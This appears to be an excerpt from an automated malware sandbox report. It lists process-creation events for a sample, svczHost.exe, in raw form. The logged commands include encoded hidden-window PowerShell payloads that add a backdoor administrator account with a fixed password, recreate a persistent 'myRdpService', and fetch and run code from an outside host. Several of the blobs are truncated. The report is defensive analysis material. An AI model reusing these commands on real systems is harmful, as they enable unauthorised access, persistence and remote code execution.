kAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net start "myRdpService"
      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
      Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /v /k "s^t^ar^t /min "" powe^r^shell -w h^i^d^d^e^n -no^l^ogo -no^p -ep b^yp^a^s^s -enco^ded^com^m^a^n^d "sqbfafgaiaaoafsavabfahgavaauaeuatgbdag8arabpae4azwbdadoaogbvafqarga4ac4arwbfafqauwb0ahiasqboaecakaaoagkavwbyacaakabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakabbaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaciayqbiafiamabjaegatqa2aewaeqa5adeazqbyafeaeabiagoaaabrafoavwbraduawgbtaekaegbpaeqaqqb1afkamga5ahqataawafeapqaiackakqapackalgbdag8abgb0aguabgb0ackakqa="" && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -nologo -nop -ep bypass -encodedcommand "sqbfafgaiaaoafsavabfahgavaauaeuatgbdag8arabpae4azwbdadoaogbvafqarga4ac4arwbfafqauwb0ahiasqboaecakaaoagkavwbyacaakabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakabbaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaciayqbiafiamabjaegatqa2aewaeqa5adeazqbyafeaeabiagoaaabrafoavwbraduawgbtaekaegbpaeqaqqb1afkamga5ahqataawafeapqaiackakqapackalgbdag8abgb0aguabgb0ackakqa="
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwb1ahkadaaxag4aoabkaguazaa5agyaygazadgamaauagmabwbtac8azgbpagwazqayac8anga3agyamaa4adiaoabkaguanqa1ageanwbiadaayqbladqamqa0admazablagyanaaxagiazqa1adgamga2aguamwa1adcamga4agyazqa1adeangbhadyaoabmagqanwa3adcangbmadqazga0adcanaa2adgaoqbiagmangbhagiamgayadianwazagmanwazagianwawageamqbkagiangbhadeazaaxageanqbhadcamgayagqayga1adcaoaayadyaywbkagiayqbmadkaygbiadeazabhadkamqa5ageayga2agianqazadkanga3agmanabiagyamaa0adqazgbiadgamgbiadgamqbhagyazabiagyamqa1aduanga5agqanqblagmaywbkaguamaazagiaywa4agmanabhadcayqa3adeanaa5adgazqbiadeazaa2agiaoaawagqamga2adaamaa3adyangbhageanwa5adgamqaxadkazqa5adcanaa0agmaywbiadkayqaxadianaa5adcangaxadgazqa4agmamgaxadkaoaa3adiangayadaamwa2aciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvah
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwb1ahkadaaxag4aoabkaguazaa5agyaygazadgamaauagmabwbtac8azgbpagwazqayac8anga3agyamaa4adiaoabkaguanqa1ageanwbiadaayqbladqamqa0admazablagyanaaxagiazqa1adgamga2aguamwa1adcamga4agyazqa1adeangbhadyaoabmagqanwa3adcangbmadqazga0adcanaa2adgaoqbiagmangbhagiamgayadianwazagmanwazagianwawageamqbkagiangbhadeazaaxageanqbhadcamgayagqayga1adcaoaayadyaywbkagiayqbmadkaygbiadeazabhadkamqa5ageayga2agianqazadkanga3agmanabiagyamaa0adqazgbiadgamgbiadgamqbhagyazabiagyamqa1aduanga5agqanqblagmaywbkaguamaazagiaywa4agmanabhadcayqa3adeanaa5adgazqbiadeazaa2agiaoaawagqamga2adaamaa3adyangbhageanwa5adgamqaxadkazqa5adcanaa0agmaywbiadkayqaxadianaa5adcangaxadgazqa4agmamgaxadkaoaa3adiangayadaamwa2aciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagad
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand zgb1ag4aywb0agkabwbuacaarwblahqalqbjagqazqbuahqaaqb0ahkaewakacaaiaagacaajaboageacgbkaeqacgbpahyazqbzacaapqagaecazqb0ac0avwbtagkatwbiagoazqbjahqaiaataemababhahmacwagafcaaqbuadmamgbfaeqaaqbzagsarabyagkadgblacaafaagafcaaablahiazqatae8aygbqaguaywb0acaaewagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhaciaiaatag8acgagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhacaalqagafmauwbeaciaiab9aaoajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaa9acaaqaaoackacgbmag8acgblageaywboacaakaakaggayqbyagqarabyagkadgblacaaaqbuacaajaboageacgbkaeqacgbpahyazqbzackaiab7aaoaiaagacaaiaakahmazqbyagkayqbsae4adqbtagiazqbyacaapqagacqaaabhahiazabeahiaaqb2agualgbtaguacgbpageababoahuabqbiaguacgakacaaiaagacaajabtag8azablagwaiaa9acaajaboageacgbkaeqacgbpahyazqauae0abwbkaguabaakacaaiaagacaajabkahiaaqb2aguasqbuagyabwagad0aiaaiafmazqbyagkayqbsacaatgb1ag0aygblahiaogagacqacwblahiaaqbhagwatgb1ag0aygblahialaagae0abwbkaguabaa6acaajabtag8azablagwaigakacaaiaagacaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaarad0aiaakagqacgbpahyazqbjag4azgbvaaoafqakacqaywbvag0aygbpag4azqbkaekabgbmag8aiaa9acaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaatagoabwbpag4aiaaiagaacgbgag4aigakacqaywbwahuasqbuagyabwagad0aiabhaguadaatafcabqbpae8aygbqaguaywb0acaalqbdagwayqbzahmaiabxagkabgazadiaxwbqahiabwbjaguacwbzag8acgakacqaywbwahuarablahqayqbpagwacwagad0aiaaiafaacgbvagmazqbzahmabwbyaekazaa6acaajaaoacqaywbwahuasqbuagyabwauafaacgbvagmazqbzahmabwbyaekazaapacwaiaboageabqbladoaiaakacgajabjahaadqbjag4azgbvac4atgbhag0azqapacwaiabnageaeabdagwabwbjagsauwbwaguazqbkadoaiaakacgajabjahaadqbjag4azgbvac4atqbhahgaqwbsag8aywbrafmacablaguazaapacwaiabvag4aaqbxahuazqbjagqaogagacqakaakagmacab1aekabgbmag8algbvag4aaqbxahuazqbjagqakqaiaaoajabhagwababjag4azgbvacaapqagaciajabjag8abqbiagkabgblagqasqbuagyabwbgahiayabuacqaywbwahuarablahqayqbpagwacwaiaaoajabtagqanqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbtaguaywb1ahiaaqb0ahkalgbdahiaeqbwahqabwbnahiayqbwaggaeqauae0araa1aemacgb5ahaadabvafmazqbyahyaaqbjaguauabyag8adgbpagqazqbyaaoajabiahkadablahmaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0aeiaeqb0aguacwaoacqayqbsagwasqbuagyabwapaaoajaboageacwboaeiaeqb0aguacwagad0aiaakag0azaa1ac4aqwbvag0acab1ahqazqbiageacwboacgajabiahkadablahmakqakacqaaabhahmaaaagad0aiabbaeiaaqb0aemabwbuahyazqbyahqazqbyaf0aoga6afqabwbtahqacgbpag4azwaoacqaaabhahmaaabcahkadablahmakqagac0acgblahaababhagmazqagaccalqanaaoaiaagacaaiabyaguadab1ahiabgagacqaaabhahmaaaa7aaoafqakagmazaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaiga7aaoajab0aguacwb0acaapqagaecazqb0ac0asqbkaguabgb0agkadab5adsacgakahqazqbzahqaiab8acaatwb1ahqalqbgagkabablacaalqbgagkabablafaayqb0aggaiaaiagqazqb2agkaywblaekazaauahqaeab0aciaiaataeuabgbjag8azabpag4azwagafuavabgadga
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand jabvahmazqbyag4ayqbtaguaiaa9acaaigbvahmazqbyadeaiga7acqacab3agqaiaa9acaaigaxadiamwa0aduanga3adgaoqahaeeamqbhaciaowagacqavqbzaguacgbqageacgbhag0acwagad0aiabaahsajwboageabqblaccaiaa9acaajabvahmazqbyag4ayqbtaguaowagaccauabhahmacwb3ag8acgbkaccaiaa9acaakabdag8abgb2aguacgb0afqabwatafmazqbjahuacgblafmadabyagkabgbnacaalqbtahqacgbpag4azwagacqacab3agqaiaataeeacwbqagwayqbpag4avablahgadaagac0argbvahiaywblackaowagaccauabhahmacwb3ag8acgbkae4azqb2aguacgbfahgacabpahiazqbzaccaiaa9acaajab0ahiadqblah0aowboaguadwataewabwbjageababvahmazqbyacaaqabvahmazqbyafaayqbyageabqbzadsajabhahiabwb1ahaauabhahiayqbtahmaiaa9acaaqab7accarwbyag8adqbwaccaiaa9acaajwbbagqabqbpag4aaqbzahqacgbhahqabwbyahmajwa7acaajwbnaguabqbiaguacganacaapqagacqavqbzaguacgbuageabqblah0aowbbagqazaataewabwbjageababhahiabwb1ahaatqblag0aygblahiaiabaaecacgbvahuacabqageacgbhag0acwa7aa0acga=
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -nologo -nop -ep bypass -encodedcommand "sqbfafgaiaaoafsavabfahgavaauaeuatgbdag8arabpae4azwbdadoaogbvafqarga4ac4arwbfafqauwb0ahiasqboaecakaaoagkavwbyacaakabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakabbaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaciayqbiafiamabjaegatqa2aewaeqa5adeazqbyafeaeabiagoaaabrafoavwbraduawgbtaekaegbpaeqaqqb1afkamga5ahqataawafeapqaiackakqapackalgbdag8abgb0aguabgb0ackakqa=" Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwb1ahkadaaxag4aoabkaguazaa5agyaygazadgamaauagmabwbtac8azgbpagwazqayac8anga3agyamaa4adiaoabkaguanqa1ageanwbiadaayqbladqamqa0admazablagyanaaxagiazqa1adgamga2aguamwa1adcamga4agyazqa1adeangbhadyaoabmagqanwa3adcangbmadqazga0adcanaa2adgaoqbiagmangbhagiamgayadianwazagmanwazagianwawageamqbkagiangbhadeazaaxageanqbhadcamgayagqayga1adcaoaayadyaywbkagiayqbmadkaygbiadeazabhadkamqa5ageayga2agianqazadkanga3agmanabiagyamaa0adqazgbiadgamgbiadgamqbhagyazabiagyamqa1aduanga5agqanqblagmaywbkaguamaazagiaywa4agmanabhadcayqa3adeanaa5adgazqbiadeazaa2agiaoaawagqamga2adaamaa3adyangbhageanwa5adgamqaxadkazqa5adcanaa0agmaywbiadkayqaxadianaa5adcangaxadgazqa4agmamgaxadkaoaa3adiangayadaamwa2aciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwb1ahkadaaxag4aoabkaguazaa5agyaygazadgamaauagmabwbtac8azgbpagwazqayac8anga3agyamaa4adiaoabkaguanqa1ageanwbiadaayqbladqamqa0admazablagyanaaxagiazqa1adgamga2aguamwa1adcamga4agyazqa1adeangbhadyaoabmagqanwa3adcangbmadqazga0adcanaa2adgaoqbiagmangbhagiamgayadianwazagmanwazagianwawageamqbkagiangbhadeazaaxageanqbhadcamgayagqayga1adcaoaayadyaywbkagiayqbmadkaygbiadeazabhadkamqa5ageayga2agianqazadkanga3agmanabiagyamaa0adqazgbiadgamgbiadgamqbhagyazabiagyamqa1aduanga5agqanqblagmaywbkaguamaazagiaywa4agmanabhadcayqa3adeanaa5adgazqbiadeazaa2agiaoaawagqamga2adaamaa3adyangbhageanwa5adgamqaxadkazqa5adcanaa0agmaywbiadkayqaxadianaa5adcangaxadgazqa4agmamgaxadkaoaa3adiangayadaamwa2aciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagadJump to behavior
